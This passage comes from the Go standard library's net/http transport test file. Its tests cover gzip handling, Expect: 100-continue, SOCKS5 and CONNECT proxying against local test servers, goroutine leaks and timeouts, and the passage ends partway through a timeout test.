790 if r.Method != "HEAD" {
791 panic("expected HEAD; got " + r.Method)
792 }
793 w.Header().Set("Transfer-Encoding", "chunked") // client should ignore
794 w.Header().Set("x-client-ipport", r.RemoteAddr)
795 w.WriteHeader(200)
796 }))
797 defer ts.Close()
798 c := ts.Client()
799
800 // Ensure that we wait for the readLoop to complete before
801 // calling Head again
802 didRead := make(chan bool)
803 SetReadLoopBeforeNextReadHook(func() { didRead <- true })
804 defer SetReadLoopBeforeNextReadHook(nil)
805
806 res1, err := c.Head(ts.URL)
807 <-didRead
808
809 if err != nil {
810 t.Fatalf("request 1 error: %v", err)
811 }
812
813 res2, err := c.Head(ts.URL)
814 <-didRead
815
816 if err != nil {
817 t.Fatalf("request 2 error: %v", err)
818 }
819 if v1, v2 := res1.Header.Get("x-client-ipport"), res2.Header.Get("x-client-ipport"); v1 != v2 {
820 t.Errorf("ip/ports differed between head requests: %q vs %q", v1, v2)
821 }
822 }
823
824 var roundTripTests = []struct {
825 accept string
826 expectAccept string
827 compressed bool
828 }{
829 // Requests with no accept-encoding header use transparent compression
830 {"", "gzip", false},
831 // Requests with other accept-encoding should pass through unmodified
832 {"foo", "foo", false},
833 // Requests with accept-encoding == gzip should be passed through
834 {"gzip", "gzip", true},
835 }
836
837 // Test that the modification made to the Request by the RoundTripper is cleaned up
838 func TestRoundTripGzip(t *testing.T) {
839 setParallel(t)
840 defer afterTest(t)
841 const responseBody = "test response body"
842 ts := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
843 accept := req.Header.Get("Accept-Encoding")
844 if expect := req.FormValue("expect_accept"); accept != expect {
845 t.Errorf("in handler, test %v: Accept-Encoding = %q, want %q",
846 req.FormValue("testnum"), accept, expect)
847 }
848 if accept == "gzip" {
849 rw.Header().Set("Content-Encoding", "gzip")
850 gz := gzip.NewWriter(rw)
851 gz.Write([]byte(responseBody))
852 gz.Close()
853 } else {
854 rw.Header().Set("Content-Encoding", accept)
855 rw.Write([]byte(responseBody))
856 }
857 }))
858 defer ts.Close()
859 tr := ts.Client().Transport.(*Transport)
860
861 for i, test := range roundTripTests {
862 // Test basic request (no accept-encoding)
863 req, _ := NewRequest("GET", fmt.Sprintf("%s/?testnum=%d&expect_accept=%s", ts.URL, i, test.expectAccept), nil)
864 if test.accept != "" {
865 req.Header.Set("Accept-Encoding", test.accept)
866 }
867 res, err := tr.RoundTrip(req)
868 var body []byte
869 if test.compressed {
870 var r *gzip.Reader
871 r, err = gzip.NewReader(res.Body)
872 if err != nil {
873 t.Errorf("%d. gzip NewReader: %v", i, err)
874 continue
875 }
876 body, err = ioutil.ReadAll(r)
877 res.Body.Close()
878 } else {
879 body, err = ioutil.ReadAll(res.Body)
880 }
881 if err != nil {
882 t.Errorf("%d. Error: %q", i, err)
883 continue
884 }
885 if g, e := string(body), responseBody; g != e {
886 t.Errorf("%d. body = %q; want %q", i, g, e)
887 }
888 if g, e := req.Header.Get("Accept-Encoding"), test.accept; g != e {
889 t.Errorf("%d. Accept-Encoding = %q; want %q (it was mutated, in violation of RoundTrip contract)", i, g, e)
890 }
891 if g, e := res.Header.Get("Content-Encoding"), test.accept; g != e {
892 t.Errorf("%d. Content-Encoding = %q; want %q", i, g, e)
893 }
894 }
895
896 }
897
898 func TestTransportGzip(t *testing.T) {
899 setParallel(t)
900 defer afterTest(t)
901 const testString = "The test string aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
902 const nRandBytes = 1024 * 1024
903 ts := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
904 if req.Method == "HEAD" {
905 if g := req.Header.Get("Accept-Encoding"); g != "" {
906 t.Errorf("HEAD request sent with Accept-Encoding of %q; want none", g)
907 }
908 return
909 }
910 if g, e := req.Header.Get("Accept-Encoding"), "gzip"; g != e {
911 t.Errorf("Accept-Encoding = %q, want %q", g, e)
912 }
913 rw.Header().Set("Content-Encoding", "gzip")
914
915 var w io.Writer = rw
916 var buf bytes.Buffer
917 if req.FormValue("chunked") == "0" {
918 w = &buf
919 defer io.Copy(rw, &buf)
920 defer func() {
921 rw.Header().Set("Content-Length", strconv.Itoa(buf.Len()))
922 }()
923 }
924 gz := gzip.NewWriter(w)
925 gz.Write([]byte(testString))
926 if req.FormValue("body") == "large" {
927 io.CopyN(gz, rand.Reader, nRandBytes)
928 }
929 gz.Close()
930 }))
931 defer ts.Close()
932 c := ts.Client()
933
934 for _, chunked := range []string{"1", "0"} {
935 // First fetch something large, but only read some of it.
936 res, err := c.Get(ts.URL + "/?body=large&chunked=" + chunked)
937 if err != nil {
938 t.Fatalf("large get: %v", err)
939 }
940 buf := make([]byte, len(testString))
941 n, err := io.ReadFull(res.Body, buf)
942 if err != nil {
943 t.Fatalf("partial read of large response: size=%d, %v", n, err)
944 }
945 if e, g := testString, string(buf); e != g {
946 t.Errorf("partial read got %q, expected %q", g, e)
947 }
948 res.Body.Close()
949 // Read on the body, even though it's closed
950 n, err = res.Body.Read(buf)
951 if n != 0 || err == nil {
952 t.Errorf("expected error post-closed large Read; got = %d, %v", n, err)
953 }
954
955 // Then something small.
956 res, err = c.Get(ts.URL + "/?chunked=" + chunked)
957 if err != nil {
958 t.Fatal(err)
959 }
960 body, err := ioutil.ReadAll(res.Body)
961 if err != nil {
962 t.Fatal(err)
963 }
964 if g, e := string(body), testString; g != e {
965 t.Fatalf("body = %q; want %q", g, e)
966 }
967 if g, e := res.Header.Get("Content-Encoding"), ""; g != e {
968 t.Fatalf("Content-Encoding = %q; want %q", g, e)
969 }
970
971 // Read on the body after it's been fully read:
972 n, err = res.Body.Read(buf)
973 if n != 0 || err == nil {
974 t.Errorf("expected Read error after exhausted reads; got %d, %v", n, err)
975 }
976 res.Body.Close()
977 n, err = res.Body.Read(buf)
978 if n != 0 || err == nil {
979 t.Errorf("expected Read error after Close; got %d, %v", n, err)
980 }
981 }
982
983 // And a HEAD request too, because they're always weird.
984 res, err := c.Head(ts.URL)
985 if err != nil {
986 t.Fatalf("Head: %v", err)
987 }
988 if res.StatusCode != 200 {
989 t.Errorf("Head status=%d; want=200", res.StatusCode)
990 }
991 }
992
993 // If a request has Expect:100-continue header, the request blocks sending body until the first response.
994 // Premature consumption of the request body should not be occurred.
995 func TestTransportExpect100Continue(t *testing.T) {
996 setParallel(t)
997 defer afterTest(t)
998
999 ts := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
1000 switch req.URL.Path {
1001 case "/100":
1002 // This endpoint implicitly responds 100 Continue and reads body.
1003 if _, err := io.Copy(ioutil.Discard, req.Body); err != nil {
1004 t.Error("Failed to read Body", err)
1005 }
1006 rw.WriteHeader(StatusOK)
1007 case "/200":
1008 // Go 1.5 adds Connection: close header if the client expect
1009 // continue but not entire request body is consumed.
1010 rw.WriteHeader(StatusOK)
1011 case "/500":
1012 rw.WriteHeader(StatusInternalServerError)
1013 case "/keepalive":
1014 // This hijacked endpoint responds error without Connection:close.
1015 _, bufrw, err := rw.(Hijacker).Hijack()
1016 if err != nil {
1017 log.Fatal(err)
1018 }
1019 bufrw.WriteString("HTTP/1.1 500 Internal Server Error\r\n")
1020 bufrw.WriteString("Content-Length: 0\r\n\r\n")
1021 bufrw.Flush()
1022 case "/timeout":
1023 // This endpoint tries to read body without 100 (Continue) response.
1024 // After ExpectContinueTimeout, the reading will be started.
1025 conn, bufrw, err := rw.(Hijacker).Hijack()
1026 if err != nil {
1027 log.Fatal(err)
1028 }
1029 if _, err := io.CopyN(ioutil.Discard, bufrw, req.ContentLength); err != nil {
1030 t.Error("Failed to read Body", err)
1031 }
1032 bufrw.WriteString("HTTP/1.1 200 OK\r\n\r\n")
1033 bufrw.Flush()
1034 conn.Close()
1035 }
1036
1037 }))
1038 defer ts.Close()
1039
1040 tests := []struct {
1041 path string
1042 body []byte
1043 sent int
1044 status int
1045 }{
1046 {path: "/100", body: []byte("hello"), sent: 5, status: 200}, // Got 100 followed by 200, entire body is sent.
1047 {path: "/200", body: []byte("hello"), sent: 0, status: 200}, // Got 200 without 100. body isn't sent.
1048 {path: "/500", body: []byte("hello"), sent: 0, status: 500}, // Got 500 without 100. body isn't sent.
1049 {path: "/keepalive", body: []byte("hello"), sent: 0, status: 500}, // Although without Connection:close, body isn't sent.
1050 {path: "/timeout", body: []byte("hello"), sent: 5, status: 200}, // Timeout exceeded and entire body is sent.
1051 }
1052
1053 c := ts.Client()
1054 for i, v := range tests {
1055 tr := &Transport{
1056 ExpectContinueTimeout: 2 * time.Second,
1057 }
1058 defer tr.CloseIdleConnections()
1059 c.Transport = tr
1060 body := bytes.NewReader(v.body)
1061 req, err := NewRequest("PUT", ts.URL+v.path, body)
1062 if err != nil {
1063 t.Fatal(err)
1064 }
1065 req.Header.Set("Expect", "100-continue")
1066 req.ContentLength = int64(len(v.body))
1067
1068 resp, err := c.Do(req)
1069 if err != nil {
1070 t.Fatal(err)
1071 }
1072 resp.Body.Close()
1073
1074 sent := len(v.body) - body.Len()
1075 if v.status != resp.StatusCode {
1076 t.Errorf("test %d: status code should be %d but got %d. (%s)", i, v.status, resp.StatusCode, v.path)
1077 }
1078 if v.sent != sent {
1079 t.Errorf("test %d: sent body should be %d but sent %d. (%s)", i, v.sent, sent, v.path)
1080 }
1081 }
1082 }
1083
1084 func TestSOCKS5Proxy(t *testing.T) {
1085 defer afterTest(t)
1086 ch := make(chan string, 1)
1087 l := newLocalListener(t)
1088 defer l.Close()
1089 defer close(ch)
1090 proxy := func(t *testing.T) {
1091 s, err := l.Accept()
1092 if err != nil {
1093 t.Errorf("socks5 proxy Accept(): %v", err)
1094 return
1095 }
1096 defer s.Close()
1097 var buf [22]byte
1098 if _, err := io.ReadFull(s, buf[:3]); err != nil {
1099 t.Errorf("socks5 proxy initial read: %v", err)
1100 return
1101 }
1102 if want := []byte{5, 1, 0}; !bytes.Equal(buf[:3], want) {
1103 t.Errorf("socks5 proxy initial read: got %v, want %v", buf[:3], want)
1104 return
1105 }
1106 if _, err := s.Write([]byte{5, 0}); err != nil {
1107 t.Errorf("socks5 proxy initial write: %v", err)
1108 return
1109 }
1110 if _, err := io.ReadFull(s, buf[:4]); err != nil {
1111 t.Errorf("socks5 proxy second read: %v", err)
1112 return
1113 }
1114 if want := []byte{5, 1, 0}; !bytes.Equal(buf[:3], want) {
1115 t.Errorf("socks5 proxy second read: got %v, want %v", buf[:3], want)
1116 return
1117 }
1118 var ipLen int
1119 switch buf[3] {
1120 case 1:
1121 ipLen = net.IPv4len
1122 case 4:
1123 ipLen = net.IPv6len
1124 default:
1125 t.Errorf("socks5 proxy second read: unexpected address type %v", buf[4])
1126 return
1127 }
1128 if _, err := io.ReadFull(s, buf[4:ipLen+6]); err != nil {
1129 t.Errorf("socks5 proxy address read: %v", err)
1130 return
1131 }
1132 ip := net.IP(buf[4 : ipLen+4])
1133 port := binary.BigEndian.Uint16(buf[ipLen+4 : ipLen+6])
1134 copy(buf[:3], []byte{5, 0, 0})
1135 if _, err := s.Write(buf[:ipLen+6]); err != nil {
1136 t.Errorf("socks5 proxy connect write: %v", err)
1137 return
1138 }
1139 ch <- fmt.Sprintf("proxy for %s:%d", ip, port)
1140
1141 // Implement proxying.
1142 targetHost := net.JoinHostPort(ip.String(), strconv.Itoa(int(port)))
1143 targetConn, err := net.Dial("tcp", targetHost)
1144 if err != nil {
1145 t.Errorf("net.Dial failed")
1146 return
1147 }
1148 go io.Copy(targetConn, s)
1149 io.Copy(s, targetConn) // Wait for the client to close the socket.
1150 targetConn.Close()
1151 }
1152
1153 pu, err := url.Parse("socks5://" + l.Addr().String())
1154 if err != nil {
1155 t.Fatal(err)
1156 }
1157
1158 sentinelHeader := "X-Sentinel"
1159 sentinelValue := "12345"
1160 h := HandlerFunc(func(w ResponseWriter, r *Request) {
1161 w.Header().Set(sentinelHeader, sentinelValue)
1162 })
1163 for _, useTLS := range []bool{false, true} {
1164 t.Run(fmt.Sprintf("useTLS=%v", useTLS), func(t *testing.T) {
1165 var ts *httptest.Server
1166 if useTLS {
1167 ts = httptest.NewTLSServer(h)
1168 } else {
1169 ts = httptest.NewServer(h)
1170 }
1171 go proxy(t)
1172 c := ts.Client()
1173 c.Transport.(*Transport).Proxy = ProxyURL(pu)
1174 r, err := c.Head(ts.URL)
1175 if err != nil {
1176 t.Fatal(err)
1177 }
1178 if r.Header.Get(sentinelHeader) != sentinelValue {
1179 t.Errorf("Failed to retrieve sentinel value")
1180 }
1181 var got string
1182 select {
1183 case got = <-ch:
1184 case <-time.After(5 * time.Second):
1185 t.Fatal("timeout connecting to socks5 proxy")
1186 }
1187 ts.Close()
1188 tsu, err := url.Parse(ts.URL)
1189 if err != nil {
1190 t.Fatal(err)
1191 }
1192 want := "proxy for " + tsu.Host
1193 if got != want {
1194 t.Errorf("got %q, want %q", got, want)
1195 }
1196 })
1197 }
1198 }
1199
1200 func TestTransportProxy(t *testing.T) {
1201 defer afterTest(t)
1202 testCases := []struct{ httpsSite, httpsProxy bool }{
1203 {false, false},
1204 {false, true},
1205 {true, false},
1206 {true, true},
1207 }
1208 for _, testCase := range testCases {
1209 httpsSite := testCase.httpsSite
1210 httpsProxy := testCase.httpsProxy
1211 t.Run(fmt.Sprintf("httpsSite=%v, httpsProxy=%v", httpsSite, httpsProxy), func(t *testing.T) {
1212 siteCh := make(chan *Request, 1)
1213 h1 := HandlerFunc(func(w ResponseWriter, r *Request) {
1214 siteCh <- r
1215 })
1216 proxyCh := make(chan *Request, 1)
1217 h2 := HandlerFunc(func(w ResponseWriter, r *Request) {
1218 proxyCh <- r
1219 // Implement an entire CONNECT proxy
1220 if r.Method == "CONNECT" {
1221 hijacker, ok := w.(Hijacker)
1222 if !ok {
1223 t.Errorf("hijack not allowed")
1224 return
1225 }
1226 clientConn, _, err := hijacker.Hijack()
1227 if err != nil {
1228 t.Errorf("hijacking failed")
1229 return
1230 }
1231 res := &Response{
1232 StatusCode: StatusOK,
1233 Proto: "HTTP/1.1",
1234 ProtoMajor: 1,
1235 ProtoMinor: 1,
1236 Header: make(Header),
1237 }
1238
1239 targetConn, err := net.Dial("tcp", r.URL.Host)
1240 if err != nil {
1241 t.Errorf("net.Dial(%q) failed: %v", r.URL.Host, err)
1242 return
1243 }
1244
1245 if err := res.Write(clientConn); err != nil {
1246 t.Errorf("Writing 200 OK failed: %v", err)
1247 return
1248 }
1249
1250 go io.Copy(targetConn, clientConn)
1251 go func() {
1252 io.Copy(clientConn, targetConn)
1253 targetConn.Close()
1254 }()
1255 }
1256 })
1257 var ts *httptest.Server
1258 if httpsSite {
1259 ts = httptest.NewTLSServer(h1)
1260 } else {
1261 ts = httptest.NewServer(h1)
1262 }
1263 var proxy *httptest.Server
1264 if httpsProxy {
1265 proxy = httptest.NewTLSServer(h2)
1266 } else {
1267 proxy = httptest.NewServer(h2)
1268 }
1269
1270 pu, err := url.Parse(proxy.URL)
1271 if err != nil {
1272 t.Fatal(err)
1273 }
1274
1275 // If neither server is HTTPS or both are, then c may be derived from either.
1276 // If only one server is HTTPS, c must be derived from that server in order
1277 // to ensure that it is configured to use the fake root CA from testcert.go.
1278 c := proxy.Client()
1279 if httpsSite {
1280 c = ts.Client()
1281 }
1282
1283 c.Transport.(*Transport).Proxy = ProxyURL(pu)
1284 if _, err := c.Head(ts.URL); err != nil {
1285 t.Error(err)
1286 }
1287 var got *Request
1288 select {
1289 case got = <-proxyCh:
1290 case <-time.After(5 * time.Second):
1291 t.Fatal("timeout connecting to http proxy")
1292 }
1293 c.Transport.(*Transport).CloseIdleConnections()
1294 ts.Close()
1295 proxy.Close()
1296 if httpsSite {
1297 // First message should be a CONNECT, asking for a socket to the real server,
1298 if got.Method != "CONNECT" {
1299 t.Errorf("Wrong method for secure proxying: %q", got.Method)
1300 }
1301 gotHost := got.URL.Host
1302 pu, err := url.Parse(ts.URL)
1303 if err != nil {
1304 t.Fatal("Invalid site URL")
1305 }
1306 if wantHost := pu.Host; gotHost != wantHost {
1307 t.Errorf("Got CONNECT host %q, want %q", gotHost, wantHost)
1308 }
1309
1310 // The next message on the channel should be from the site's server.
1311 next := <-siteCh
1312 if next.Method != "HEAD" {
1313 t.Errorf("Wrong method at destination: %s", next.Method)
1314 }
1315 if nextURL := next.URL.String(); nextURL != "/" {
1316 t.Errorf("Wrong URL at destination: %s", nextURL)
1317 }
1318 } else {
1319 if got.Method != "HEAD" {
1320 t.Errorf("Wrong method for destination: %q", got.Method)
1321 }
1322 gotURL := got.URL.String()
1323 wantURL := ts.URL + "/"
1324 if gotURL != wantURL {
1325 t.Errorf("Got URL %q, want %q", gotURL, wantURL)
1326 }
1327 }
1328 })
1329 }
1330 }

// Issue 16997: test transport dial preserves typed errors
func TestTransportDialPreservesNetOpProxyError(t *testing.T) {
	defer afterTest(t)

	var errDial = errors.New("some dial error")

	tr := &Transport{
		Proxy: func(*Request) (*url.URL, error) {
			return url.Parse("http://proxy.fake.tld/")
		},
		Dial: func(string, string) (net.Conn, error) {
			return nil, errDial
		},
	}
	defer tr.CloseIdleConnections()

	c := &Client{Transport: tr}
	req, _ := NewRequest("GET", "http://fake.tld", nil)
	res, err := c.Do(req)
	if err == nil {
		res.Body.Close()
		t.Fatal("wanted a non-nil error")
	}

	uerr, ok := err.(*url.Error)
	if !ok {
		t.Fatalf("got %T, want *url.Error", err)
	}
	oe, ok := uerr.Err.(*net.OpError)
	if !ok {
		t.Fatalf("url.Error.Err = %T; want *net.OpError", uerr.Err)
	}
	want := &net.OpError{
		Op:  "proxyconnect",
		Net: "tcp",
		Err: errDial, // original error, unwrapped.
	}
	if !reflect.DeepEqual(oe, want) {
		t.Errorf("Got error %#v; want %#v", oe, want)
	}
}

// TestTransportGzipRecursive sends a gzip quine and checks that the
// client gets the same value back. This is more cute than anything,
// but checks that we don't recurse forever, and checks that
// Content-Encoding is removed.
func TestTransportGzipRecursive(t *testing.T) {
	defer afterTest(t)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		w.Header().Set("Content-Encoding", "gzip")
		w.Write(rgz)
	}))
	defer ts.Close()

	c := ts.Client()
	res, err := c.Get(ts.URL)
	if err != nil {
		t.Fatal(err)
	}
	body, err := ioutil.ReadAll(res.Body)
	if err != nil {
		t.Fatal(err)
	}
	if !bytes.Equal(body, rgz) {
		t.Fatalf("Incorrect result from recursive gz:\nhave=%x\nwant=%x",
			body, rgz)
	}
	if g, e := res.Header.Get("Content-Encoding"), ""; g != e {
		t.Fatalf("Content-Encoding = %q; want %q", g, e)
	}
}

// golang.org/issue/7750: request fails when server replies with
// a short gzip body
func TestTransportGzipShort(t *testing.T) {
	defer afterTest(t)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		w.Header().Set("Content-Encoding", "gzip")
		w.Write([]byte{0x1f, 0x8b})
	}))
	defer ts.Close()

	c := ts.Client()
	res, err := c.Get(ts.URL)
	if err != nil {
		t.Fatal(err)
	}
	defer res.Body.Close()
	_, err = ioutil.ReadAll(res.Body)
	if err == nil {
		t.Fatal("Expected an error from reading the body.")
	}
	if err != io.ErrUnexpectedEOF {
		t.Errorf("ReadAll error = %v; want io.ErrUnexpectedEOF", err)
	}
}

// Wait until the number of goroutines is no greater than nmax, or time out.
func waitNumGoroutine(nmax int) int {
	nfinal := runtime.NumGoroutine()
	for ntries := 10; ntries > 0 && nfinal > nmax; ntries-- {
		time.Sleep(50 * time.Millisecond)
		runtime.GC()
		nfinal = runtime.NumGoroutine()
	}
	return nfinal
}

// tests that persistent goroutine connections shut down when no longer desired.
func TestTransportPersistConnLeak(t *testing.T) {
	// Not parallel: counts goroutines
	defer afterTest(t)

	const numReq = 25
	gotReqCh := make(chan bool, numReq)
	unblockCh := make(chan bool, numReq)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		gotReqCh <- true
		<-unblockCh
		w.Header().Set("Content-Length", "0")
		w.WriteHeader(204)
	}))
	defer ts.Close()
	c := ts.Client()
	tr := c.Transport.(*Transport)

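	// Take a goroutine-count baseline before issuing any requests; after the
	// requests finish and idle conns are closed, the count should return to
	// roughly this value.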
	n0 := runtime.NumGoroutine()

	didReqCh := make(chan bool, numReq)
	failed := make(chan bool, numReq)
	for i := 0; i < numReq; i++ {
		go func() {
			res, err := c.Get(ts.URL)
			didReqCh <- true
			if err != nil {
				t.Errorf("client fetch error: %v", err)
				failed <- true
				return
			}
			res.Body.Close()
		}()
	}

	// Wait for all goroutines to be stuck in the Handler.
	for i := 0; i < numReq; i++ {
		select {
		case <-gotReqCh:
			// ok
		case <-failed:
			close(unblockCh)
			return
		}
	}

	nhigh := runtime.NumGoroutine()

	// Tell all handlers to unblock and reply.
	for i := 0; i < numReq; i++ {
		unblockCh <- true
	}

	// Wait for all HTTP clients to be done.
	for i := 0; i < numReq; i++ {
		<-didReqCh
	}

	tr.CloseIdleConnections()
	nfinal := waitNumGoroutine(n0 + 5)

	growth := nfinal - n0

	// We expect 0 or 1 extra goroutine, empirically. Allow up to 5.
	// Previously we were leaking one per numReq.
	if int(growth) > 5 {
		t.Logf("goroutine growth: %d -> %d -> %d (delta: %d)", n0, nhigh, nfinal, growth)
		t.Error("too many new goroutines")
	}
}

// golang.org/issue/4531: Transport leaks goroutines when
// request.ContentLength is explicitly short
func TestTransportPersistConnLeakShortBody(t *testing.T) {
	// Not parallel: measures goroutines.
	defer afterTest(t)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
	}))
	defer ts.Close()
	c := ts.Client()
	tr := c.Transport.(*Transport)

	n0 := runtime.NumGoroutine()
	body := []byte("Hello")
	for i := 0; i < 20; i++ {
		req, err := NewRequest("POST", ts.URL, bytes.NewReader(body))
		if err != nil {
			t.Fatal(err)
		}
		req.ContentLength = int64(len(body) - 2) // explicitly short
		_, err = c.Do(req)
		if err == nil {
			t.Fatal("Expected an error from writing too long a body.")
		}
	}
	nhigh := runtime.NumGoroutine()
	tr.CloseIdleConnections()
	nfinal := waitNumGoroutine(n0 + 5)

	growth := nfinal - n0

	// We expect 0 or 1 extra goroutine, empirically. Allow up to 5.
	// Previously we were leaking one per numReq.
	t.Logf("goroutine growth: %d -> %d -> %d (delta: %d)", n0, nhigh, nfinal, growth)
	if int(growth) > 5 {
		t.Error("too many new goroutines")
	}
}

// This used to crash; https://golang.org/issue/3266
func TestTransportIdleConnCrash(t *testing.T) {
	defer afterTest(t)
	var tr *Transport

	unblockCh := make(chan bool, 1)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		<-unblockCh
		tr.CloseIdleConnections()
	}))
	defer ts.Close()
	c := ts.Client()
	tr = c.Transport.(*Transport)

	didreq := make(chan bool)
	go func() {
		res, err := c.Get(ts.URL)
		if err != nil {
			t.Error(err)
		} else {
			res.Body.Close() // returns idle conn
		}
		didreq <- true
	}()
	unblockCh <- true
	<-didreq
}

// Test that the transport doesn't close the TCP connection early,
// before the response body has been read. This was a regression
// which sadly lacked a triggering test. The large response body made
// the old race easier to trigger.
func TestIssue3644(t *testing.T) {
	defer afterTest(t)
	const numFoos = 5000
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		w.Header().Set("Connection", "close")
		for i := 0; i < numFoos; i++ {
			w.Write([]byte("foo "))
		}
	}))
	defer ts.Close()
	c := ts.Client()
	res, err := c.Get(ts.URL)
	if err != nil {
		t.Fatal(err)
	}
	defer res.Body.Close()
	bs, err := ioutil.ReadAll(res.Body)
	if err != nil {
		t.Fatal(err)
	}
	if len(bs) != numFoos*len("foo ") {
		t.Errorf("unexpected response length")
	}
}

// Test that a client receives a server's reply, even if the server doesn't read
// the entire request body.
func TestIssue3595(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	const deniedMsg = "sorry, denied."
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		Error(w, deniedMsg, StatusUnauthorized)
	}))
	defer ts.Close()
	c := ts.Client()
	res, err := c.Post(ts.URL, "application/octet-stream", neverEnding('a'))
	if err != nil {
		t.Errorf("Post: %v", err)
		return
	}
	got, err := ioutil.ReadAll(res.Body)
	if err != nil {
		t.Fatalf("Body ReadAll: %v", err)
	}
	if !strings.Contains(string(got), deniedMsg) {
		t.Errorf("Known bug: response %q does not contain %q", got, deniedMsg)
	}
}

// From https://golang.org/issue/4454,
// "client fails to handle requests with no body and chunked encoding"
func TestChunkedNoContent(t *testing.T) {
	defer afterTest(t)
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		w.WriteHeader(StatusNoContent)
	}))
	defer ts.Close()

	c := ts.Client()
	for _, closeBody := range []bool{true, false} {
		const n = 4
		for i := 1; i <= n; i++ {
			res, err := c.Get(ts.URL)
			if err != nil {
				t.Errorf("closeBody=%v, req %d/%d: %v", closeBody, i, n, err)
			} else {
				if closeBody {
					res.Body.Close()
				}
			}
		}
	}
}

func TestTransportConcurrency(t *testing.T) {
	// Not parallel: uses global test hooks.
	defer afterTest(t)
	maxProcs, numReqs := 16, 500
	if testing.Short() {
		maxProcs, numReqs = 4, 50
	}
	defer runtime.GOMAXPROCS(runtime.GOMAXPROCS(maxProcs))
	ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
		fmt.Fprintf(w, "%v", r.FormValue("echo"))
	}))
	defer ts.Close()

	var wg sync.WaitGroup
	wg.Add(numReqs)

	// Due to the Transport's "socket late binding" (see
	// idleConnCh in transport.go), the numReqs HTTP requests
	// below can finish with a dial still outstanding. To keep
	// the leak checker happy, keep track of pending dials and
	// wait for them to finish (and be closed or returned to the
	// idle pool) before we close idle connections.
	SetPendingDialHooks(func() { wg.Add(1) }, wg.Done)
	defer SetPendingDialHooks(nil, nil)

	c := ts.Client()
	reqs := make(chan string)
	defer close(reqs)

	for i := 0; i < maxProcs*2; i++ {
		go func() {
			for req := range reqs {
				res, err := c.Get(ts.URL + "/?echo=" + req)
				if err != nil {
					t.Errorf("error on req %s: %v", req, err)
					wg.Done()
					continue
				}
				all, err := ioutil.ReadAll(res.Body)
				if err != nil {
					t.Errorf("read error on req %s: %v", req, err)
					wg.Done()
					continue
				}
				if string(all) != req {
					t.Errorf("body of req %s = %q; want %q", req, all, req)
				}
				res.Body.Close()
				wg.Done()
			}
		}()
	}
	for i := 0; i < numReqs; i++ {
		reqs <- fmt.Sprintf("request-%d", i)
	}
	wg.Wait()
}

func TestIssue4191_InfiniteGetTimeout(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	const debug = false
	mux := NewServeMux()
	mux.HandleFunc("/get", func(w ResponseWriter, r *Request) {
		io.Copy(w, neverEnding('a'))
	})
	ts := httptest.NewServer(mux)
	defer ts.Close()
	timeout := 100 * time.Millisecond

	c := ts.Client()
	c.Transport.(*Transport).Dial = func(n, addr string) (net.Conn, error) {
		conn, err := net.Dial(n, addr)
		if err != nil {
			return nil, err
		}
		conn.SetDeadline(time.Now().Add(timeout))
		if debug {
			conn = NewLoggingConn("client", conn)
		}
		return conn, nil
	}

	getFailed := false
	nRuns := 5
	if testing.Short() {
		nRuns = 1
	}
	for i := 0; i < nRuns; i++ {
		if debug {
			println("run", i+1, "of", nRuns)
		}
		sres, err := c.Get(ts.URL + "/get")
		if err != nil {
			if !getFailed {
				// Make the timeout longer, once.
				getFailed = true
				t.Logf("increasing timeout")
				i--
				timeout *= 10
				continue
			}
			t.Errorf("Error issuing GET: %v", err)
			break
		}
		_, err = io.Copy(ioutil.Discard, sres.Body)
		if err == nil {
			t.Errorf("Unexpected successful copy")
			break
		}
	}
	if debug {
		println("tests complete; waiting for handlers to finish")
	}
}

func TestIssue4191_InfiniteGetToPutTimeout(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	const debug = false
	mux := NewServeMux()
	mux.HandleFunc("/get", func(w ResponseWriter, r *Request) {
		io.Copy(w, neverEnding('a'))
	})
	mux.HandleFunc("/put", func(w ResponseWriter, r *Request) {
		defer r.Body.Close()
		io.Copy(ioutil.Discard, r.Body)
	})
	ts := httptest.NewServer(mux)
	timeout := 100 * time.Millisecond

	c := ts.Client()
	c.Transport.(*Transport).Dial = func(n, addr string) (net.Conn, error) {
		conn, err := net.Dial(n, addr)
		if err != nil {
			return nil, err
		}
		conn.SetDeadline(time.Now().Add(timeout))
		if debug {
			conn = NewLoggingConn("client", conn)
		}
		return conn, nil
	}

	getFailed := false
	nRuns := 5
	if testing.Short() {
		nRuns = 1
	}
	for i := 0; i < nRuns; i++ {
		if debug {
			println("run", i+1, "of", nRuns)
		}
		sres, err := c.Get(ts.URL + "/get")
		if err != nil {
			if !getFailed {
				// Make the timeout longer, once.
				getFailed = true
				t.Logf("increasing timeout")
				i--
				timeout *= 10
				continue
			}
			t.Errorf("Error issuing GET: %v", err)
			break
		}
		req, _ := NewRequest("PUT", ts.URL+"/put", sres.Body)
		_, err = c.Do(req)
		if err == nil {
			sres.Body.Close()
			t.Errorf("Unexpected successful PUT")
			break
		}
		sres.Body.Close()
	}
	if debug {
		println("tests complete; waiting for handlers to finish")
	}
	ts.Close()
}

func TestTransportResponseHeaderTimeout(t *testing.T) {
	setParallel(t)
	defer afterTest(t)
	if testing.Short() {
		t.Skip("skipping timeout test in -short mode")
	}
	inHandler := make(chan bool, 1)
	mux := NewServeMux()
	mux.HandleFunc("/fast", func(w ResponseWriter, r *Request) {
		inHandler <- true
	})
	mux.HandleFunc("/slow", func(w ResponseWriter, r *Request) {
		inHandler <- true
		time.Sleep(2 * time.Second)
	})
	ts := httptest.NewServer(mux)
	defer ts.Close()

	c := ts.Client()
	c.Transport.(*Transport).ResponseHeaderTimeout = 500 * time.Millisecond

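	// Hit the fast handler, then the slow one (which must trip the header
	// timeout), then the fast one again to show the client still works.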
